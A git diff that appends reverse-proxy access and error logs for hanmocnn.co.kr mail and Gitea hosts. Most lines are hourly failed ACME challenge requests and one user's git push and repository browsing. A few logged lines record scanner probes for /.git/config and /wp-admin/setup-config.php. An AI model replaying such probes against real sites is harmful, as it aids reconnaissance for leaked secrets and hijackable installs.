+[18/Feb/2026:21:40:31 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/183921038210713" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[18/Feb/2026:22:12:24 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" +[18/Feb/2026:22:40:56 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/289971436316962" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" diff --git a/npm/data/logs/proxy-host-3_error.log b/npm/data/logs/proxy-host-3_error.log index fcfdfa1..5931d29 100644 --- a/npm/data/logs/proxy-host-3_error.log +++ b/npm/data/logs/proxy-host-3_error.log @@ -69,3 +69,44 @@ 2026/02/17 00:22:12 [error] 897#897: *40032 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76192759520205" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76192759520205 HTTP/1.1", host: "mail.hanmocnn.co.kr" 2026/02/17 01:22:35 [error] 895#895: *40148 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/138904984342" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/138904984342 HTTP/1.1", host: "mail.hanmocnn.co.kr" 2026/02/17 02:23:01 [error] 895#895: *40347 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3760852418392" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3760852418392 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 03:23:26 [error] 896#896: *40714 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31925400925461" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/31925400925461 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 04:23:52 [error] 897#897: *40922 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29296462930121" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29296462930121 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 05:24:20 [error] 899#899: *42449 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8775229557005" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8775229557005 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 06:24:44 [error] 908#908: *42484 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/26404614411107" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/26404614411107 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 07:25:11 [error] 913#913: *44023 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/162203037210280" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/162203037210280 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 08:25:35 [error] 913#913: *44057 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/15000139395299" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/15000139395299 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 09:25:59 [error] 906#906: *44107 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/123902837915426" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/123902837915426 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 10:26:22 [error] 913#913: *45616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/185053078217732" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/185053078217732 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 11:26:46 [error] 906#906: *45647 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/6578555819323" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/6578555819323 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 12:27:11 [error] 922#922: *47159 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2804286426223" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2804286426223 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 13:27:35 [error] 924#924: *49877 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/155841106229467" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/155841106229467 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 14:28:01 [error] 917#917: *54223 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21337180706381" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21337180706381 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 15:28:23 [error] 917#917: *59840 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25112267021969" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25112267021969 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 16:28:48 [error] 917#917: *67902 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/354784396374" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/354784396374 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 17:29:13 [error] 920#920: *74708 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/315722950220654" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/315722950220654 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 18:29:36 [error] 933#933: *80974 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/259151616618584" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/259151616618584 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 19:29:58 [error] 935#935: *89640 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/20871894712564" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/20871894712564 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 21:30:48 [error] 934#934: *92656 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8218176617090" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8218176617090 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 22:31:13 [error] 928#928: *92781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/1185790923909" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/1185790923909 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/17 23:31:39 [error] 928#928: *93030 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8643163407278" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8643163407278 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 00:32:01 [error] 946#946: *93258 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/985854727990" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/985854727990 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 01:32:23 [error] 942#942: *93476 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/30312320418403" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/30312320418403 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 02:32:47 [error] 939#939: *93556 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/5977297493722" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/5977297493722 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 03:33:13 [error] 943#943: *93664 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/66232682630494" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/66232682630494 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 04:33:38 [error] 943#943: *93729 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19312097525391" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19312097525391 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 05:34:01 [error] 941#941: *93756 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13353443411800" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13353443411800 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 06:34:23 [error] 955#955: *96807 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76892721029507" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76892721029507 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 07:34:47 [error] 956#956: *96901 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/749408432210" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/749408432210 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 10:36:09 [error] 950#950: *97000 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29692719730346" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29692719730346 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 11:36:34 [error] 952#952: *98616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/302411196212851" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/302411196212851 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 12:36:57 [error] 964#964: *98743 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/16296355028267" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/16296355028267 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 13:37:20 [error] 968#968: *100443 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/28058106558622" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/28058106558622 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 14:37:43 [error] 968#968: *100689 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25402311981443" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25402311981443 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 15:38:05 [error] 962#962: *100707 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2010270943770" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2010270943770 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 16:38:31 [error] 961#961: *100725 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19835181027399" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19835181027399 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 17:38:54 [error] 963#963: *100781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13394307029520" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13394307029520 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 18:39:22 [error] 978#978: *100804 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/296711207917157" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/296711207917157 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 19:39:45 [error] 972#972: *100822 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/4540805912569" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/4540805912569 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 20:40:09 [error] 973#973: *100933 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8014472331921" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8014472331921 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 21:40:31 [error] 972#972: *102585 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/183921038210713" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/183921038210713 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/18 22:40:56 [error] 973#973: *102682 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/289971436316962" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/289971436316962 HTTP/1.1", host: "mail.hanmocnn.co.kr" diff --git a/npm/data/logs/proxy-host-4_access.log b/npm/data/logs/proxy-host-4_access.log index 9807197..11c9d4b 100644 --- a/npm/data/logs/proxy-host-4_access.log +++ b/npm/data/logs/proxy-host-4_access.log @@ -10675,3 +10675,42483 @@ [16/Feb/2026:22:05:32 +0000] - 301 301 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 87.236.176.137] [Length 58] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" [16/Feb/2026:22:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 87.236.176.137] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "https://git.hanmocnn.co.kr/favicon.ico" [16/Feb/2026:23:44:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" +[17/Feb/2026:02:36:30 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:02:36:31 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:02:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:02:36:39 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:02:36:40 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[17/Feb/2026:02:36:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:02:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20243] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.104] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[17/Feb/2026:02:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 222.117.41.51] [Length 195663] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 27] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 